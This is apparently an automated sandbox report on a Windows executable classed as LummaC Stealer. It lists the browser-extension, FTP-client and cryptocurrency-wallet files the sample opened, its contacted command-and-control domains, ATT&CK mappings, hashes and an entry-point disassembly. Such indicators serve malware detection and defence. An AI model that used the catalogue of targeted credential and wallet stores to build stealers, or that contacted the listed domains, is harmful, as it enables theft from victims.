Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1010720289.00000000012DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.985320183.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1010456185.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1010752102.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.985152699.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SoftWare.exe1.exe PID: 4600, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: SoftWare.exe1.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: 2.2.SoftWare.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SoftWare.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2134397080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SoftWare.exe1.exe	42%	Virustotal		Browse
SoftWare.exe1.exe	39%	ReversingLabs	Win32.Exploit.LummaC

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://citydisco.bet:443/gdJISl	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
https://citydisco.bet/s	0%	Avira URL Cloud	safe
https://citydisco.bet//	0%	Avira URL Cloud	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	0%	Avira URL Cloud	safe
crosshairc.life/dAnjhw	100%	Avira URL Cloud	malware
https://citydisco.bet/gdJISDZ0c	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISt4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
citydisco.bet	188.114.96.3	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
mrodularmall.top/aNzS	false		high
bugildbett.top/bAuz	false		high
jowinjoinery.icu/bdWUa	false		high
legenassedk.top/bdpWO	false		high
citydisco.bet/gdJIS	false		high
htardwarehu.icu/Sbdsa	false		high
https://citydisco.bet/gdJIS	false		high
crosshairc.life/dAnjhw	true	Avira URL Cloud: malware	unknown
cjlaspcorne.icu/DbIps	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://citydisco.bet:443/gdJIS	SoftWare.exe1.exe, 00000002.00000002.2135526996.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686583042.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686631716.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1076846866.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet//	SoftWare.exe1.exe, 00000002.00000003.1076778996.000000000132D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/s	SoftWare.exe1.exe, 00000002.00000003.1010678816.0000000001331000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010456185.0000000001327000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/gdJISDZ0c	SoftWare.exe1.exe, 00000002.00000003.957107611.0000000001359000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.956104000.0000000001359000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001359000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.955438817.0000000001354000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet:443/gdJISl	SoftWare.exe1.exe, 00000002.00000003.1076846866.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	SoftWare.exe1.exe, 00000002.00000003.957205964.0000000003D74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20w	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/	SoftWare.exe1.exe, 00000002.00000003.1010678816.0000000001331000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010456185.0000000001327000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/gdJISt4	SoftWare.exe1.exe, 00000002.00000003.955924921.000000000134A000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.955617694.0000000001349000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	SoftWare.exe1.exe, 00000002.00000003.957205964.0000000003D74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	citydisco.bet	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637282
Start date and time:	2025-03-13 13:39:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SoftWare.exe1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 49 Number of non-executed functions: 154
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 23.60.203.209
Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:40:02	API Interceptor	7x Sleep call for process: SoftWare.exe1.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	kVPzMgJglW.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	tnZI8EzSx3.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/sdhm/
	7zKn77RsRX.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	hQaXUS5gt0.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	zzSk99EqY0.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/sdhm/
	2k3GtCY6Zz.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/nhmj/
	3tEL1ZRXA6.exe	Get hash	malicious	FormBook	Browse	www.marposet.shop/6ixs/?Ar6T=oN0T/Esi7H2jJ4TMjw8b93BQPnEdNzyQiBUPeT1k8Z/eibB9ghV+qpvP7NsuhjacLnuX6HraU4xmdMUu2umYnCC8s1rtYFvj99qSyPPCwvQggIKSHQ==&Lfpd=o6ndcl
	2rvyZc27tz.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	INVOICE 4562.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/jjft/
	Payment-031025-pdf.exe	Get hash	malicious	FormBook	Browse	www.ezjytrkuqlw.info/zsr7/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
citydisco.bet	FortniteHack.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.97.3
	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	Galaxy Swapper v2.0.3.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	13s1HMkHKv.exe	Get hash	malicious	Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	FortniteHack.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	NDQ211216GM08.exe.bin.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.19.24
	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.144.37
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.uk	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	FortniteHack.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	setupx 1.exe1.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	script5.ps1	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	PO #S149102025.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.5726802101270785
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SoftWare.exe1.exe
File size:	784'192 bytes
MD5:	87a47a76f6fa81e316f77d1fbe07eef1
SHA1:	e3455675f40783b67207aa37f5380493e54c4f18
SHA256:	bf1afeb9f9662c5811556d7e3157d9225657e10573d44fee67c332acfbfc326c
SHA512:	222957df882aac66fe194ee6386c67c9f3215a32c2b99a91ab83245eec25491908f71733c83bfdba4e9d590b9a7fb719c5e6a8d9068f13fae9c72450f06f2196
SSDEEP:	12288:DIJQ/s2kiatVPnIpbWiJ621POPAANU/FIuETl5qGlsecGHaRsuAVHETqpVEe1h3N:MBnIpnJhdQAANeStTTlkG6FDmpdQAzJ
TLSH:	D1F4DF46BC92D0B3EE1628B15928E7C51D6B6B204F2085FB7BDC9D646FB36E14832317
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.............................w............@.......................................@.................................P...(..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4377d2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D1BF1F [Wed Mar 12 17:06:39 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	033c5f85fb620246315503dc218ebc8c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	15/12/2020 22:24:20 02/12/2021 22:24:20
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	31F605F0D1D4BA54250DA5C719A8200C
Thumbprint SHA-1:	E8C15B4C98AD91E051EE5AF5F524A8729050B2A2
Thumbprint SHA-256:	22A3C23E08C7DBB4E7F4591E58C04285C0514C2894E3C418AD157D817D7EDF3C
Serial:	33000003DE8D56825AF1A4A9670000000003DE

Entrypoint Preview

Instruction
call 00007F3B70EB75AAh
jmp 00007F3B70EB7419h
mov ecx, dword ptr [0045F840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F3B70EB75A6h
test esi, ecx
jne 00007F3B70EB75C8h
call 00007F3B70EB75D1h
mov ecx, eax
cmp ecx, edi
jne 00007F3B70EB75A9h
mov ecx, BB40E64Fh
jmp 00007F3B70EB75B0h
test esi, ecx
jne 00007F3B70EB75ACh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0045F840h], ecx
not ecx
pop edi
mov dword ptr [0045F880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
